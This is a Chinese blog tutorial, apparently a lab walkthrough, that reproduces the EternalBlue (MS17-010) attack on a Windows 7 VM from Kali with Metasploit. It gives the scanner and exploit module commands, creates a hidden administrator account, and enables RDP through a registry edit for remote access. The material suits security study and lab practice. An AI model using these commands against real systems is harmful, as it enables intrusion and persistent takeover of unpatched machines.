Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >利用永恒之蓝(MS17010)漏洞攻击靶机

利用永恒之蓝(MS17010)漏洞攻击靶机

作者头像
777nx
发布于 2023-10-18 07:13:49
发布于 2023-10-18 07:13:49
95800
代码可运行
举报
运行总次数:0
代码可运行

参考:利用永恒之蓝(MS17010)漏洞攻击靶机

MS17010漏洞复现和利用

相关环境

攻击机:Kali-linux 2023.2a 靶机:Windows 7 SP1旗舰版

获取靶机IP地址

打开cmd查看ip地址

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ipconfig

关闭防火墙,检查通讯状态

需要关闭靶机的防火墙

打开网络和共享中心

进入windows防火墙设置

成功关闭防火墙

检查通讯状况

在kali linux里

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ping 192.168.137.130

在windows 7里

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ping 192.168.137.128

两边都ping得通,说明通讯正常

攻击步骤

检查是否存在漏洞

运行postgresql数据库

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
service postgresql start

打开msf

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
msfconsole

使用相关模块

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
use  auxiliary/scanner/smb/smb_ms17_010

查看相关配置信息

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
show options

设置目标IP为靶机的IP

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
set rhost 192.168.137.130

开始对靶机进行扫描

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
run 
发现漏洞并攻击

搜索msf17010漏洞模块

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
search ms17-010

使用该漏洞模块进行攻击

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
use exploit/windows/smb/ms17_010_eternalblue 

查看其配置详情

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
show options

设置靶机IP

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
set rhost 192.168.137.130

使用exploit或者run命令进行攻击

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
exploit

获取shell

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
shell
利用漏洞提权

创建管理员账户

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
net user pigpig 123456 /add

我们在win7那边已经可以看到了

增加管理员权限

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
net localgroup administrators pigpig /add

在去win7那边观察

开启3389端口并远程访问控制

将win7靶机那边远程服务打开

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

打开3389端口之后,在新的shell里

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
rdesktop 192.168.137.130:3389

点击yes之后,就可以在kali里面进入到win7靶机了。

输入账户密码回车,点了同意靶机的管理员账户就会掉线

成功进入了

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-08-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
MS17010(永恒之蓝)漏洞复现
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/132483.html原文链接:https://javaforall.cn
全栈程序员站长
2022/08/13
1.3K0
MS17010(永恒之蓝)漏洞复现
永恒之蓝漏洞复现(MS17010)
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
全栈程序员站长
2022/08/15
1.1K0
永恒之蓝漏洞复现(MS17010)
永恒之蓝(MS17010)漏洞复现
永恒之蓝是指黑客团体Shadow Brokers公布的大批网络攻击工具,其中就包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞来获取系统最高权限。
全栈程序员站长
2022/08/18
1.9K0
永恒之蓝(MS17010)漏洞复现
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
Meterpreter的功能丰富,例如添加用户、隐藏某些内容、打开shell、获取用户密码、上传和下载远程主机的文件、运行cmd.exe、捕捉屏幕、获取远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等。此外,Meterpreter可以躲避入侵检测系统,在远程主机上隐藏自己,不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统)很难对它做出响应。
用户8909609
2023/12/27
17.2K0
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
漏洞考古之永恒之蓝原理及利用
1.使用kali作为攻击机,windows7(旗舰版)作为靶机,靶机IP地址未知,但kali和靶机均在同一个网段,可ping通
网络安全自修室
2022/12/06
1.6K0
漏洞考古之永恒之蓝原理及利用
实战打靶 - 巧用smb拿下不出网主机
这篇文章由好友@Drunkmars投稿,写的非常详细,适合新手朋友学习,首发先知社区。
潇湘信安
2021/07/01
1.5K0
永恒之蓝(ms17-010)漏洞复现
  永恒之蓝(ms17-010)过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
LuckySec
2022/11/02
3.4K0
永恒之蓝(ms17-010)漏洞复现
利用MS17_010(永恒之蓝)漏洞攻击windows系统
攻击机 Kali Linux:192.168.48.128 靶机 Windows Server 2008 R2 x64:192.168.48.129
用户7162790
2022/03/23
1.6K0
利用MS17_010(永恒之蓝)漏洞攻击windows系统
ATT&CK实战系统-红队实战(一)
很久之前放到收藏夹里的红日靶机,之前总想着汇总一下打一打,但是硬盘没有太大空间就没有去下载搭建(其实就是懒),最近写毕设的过程中无聊换换脑子来打一打。
用户2700375
2023/01/30
8250
ATT&CK实战系统-红队实战(一)
永恒之蓝漏洞入侵_永恒之蓝漏洞探测
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
全栈程序员站长
2022/11/03
1.3K0
永恒之蓝漏洞入侵_永恒之蓝漏洞探测
记一次灰常灰常艰难的利用永恒之蓝漏洞实现的内网多节点靶场渗透
完成后在浏览器中输入192.168.100.50即可访问dedecms主页,渗透之路由此开始
公众号爱国小白帽
2020/11/19
7660
记一次灰常灰常艰难的利用永恒之蓝漏洞实现的内网多节点靶场渗透
实战 | 记一次基础的内网Vulnstack靶机渗透一
靶场地址与介绍:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
HACK学习
2021/03/19
3.7K1
MS17010(永恒之蓝)漏洞利用与复现
Ehernal Blue通过Tcp端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只需要开机上网,攻击者就能在电脑和服务器中植入勒索软件。
全栈程序员站长
2022/06/30
8890
MS17010(永恒之蓝)漏洞利用与复现
利用ms17_010开启3389端口
当nmap或其他工具发现目标及上有445端口开启,可以考虑检测是否存在永恒之蓝,使用msf中的永恒之蓝检测模块
字节脉搏实验室
2020/03/08
3.5K0
利用ms17_010开启3389端口
vulntarget-a靶机渗透测试报告
前言 在今年的红明谷杯决赛中得知了vulntarget-a靶场(我所打的一个办公OA系统就和他这环境几乎一模一样 而且我在比赛的时候好像是校园网的原因(老背锅侠了),不管我正连反连设置payload等
MssnHarvey
2022/08/10
1.5K0
vulntarget-a靶机渗透测试报告
一次简单的内网渗透靶场练习
当开启general log为on时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。所以为了get shell,我们将general log设为on,将general log file设为C:/phpStudy/WWW/test.php
HACK学习
2020/11/03
2.1K0
一次简单的内网渗透靶场练习
MS17_010漏洞利用,渗透win7,拿到桌面的flag
我们先ping一下win7的ip看看是否可以ping通(ping不通的可以关闭win7的防火墙),然后我们用nmap扫一下看看靶机有什么漏洞
Anime_Bucket
2022/08/23
1.1K0
MS17_010漏洞利用,渗透win7,拿到桌面的flag
关于ms17010渗透
今天来说一下ms17010渗透,大家都知道在2017爆发出来了永恒之蓝病毒,导致比特币严重涨价(为啥我没屯几个,这可能就是我穷的的原因吧),永恒之蓝的漏洞版本名称也被称之为ms17_010今天就来详细和大家讲一下
全栈程序员站长
2022/08/11
7160
关于ms17010渗透
红队/白帽必经之路(20)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
3250
红队/白帽必经之路(20)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透[既然是红队,那就对自己狠一点]
MSF框架实现“永恒之蓝”ms17-010的exp攻击
其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。
逍遥子大表哥
2021/12/17
1.4K0
MSF框架实现“永恒之蓝”ms17-010的exp攻击
推荐阅读
相关推荐
MS17010(永恒之蓝)漏洞复现
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验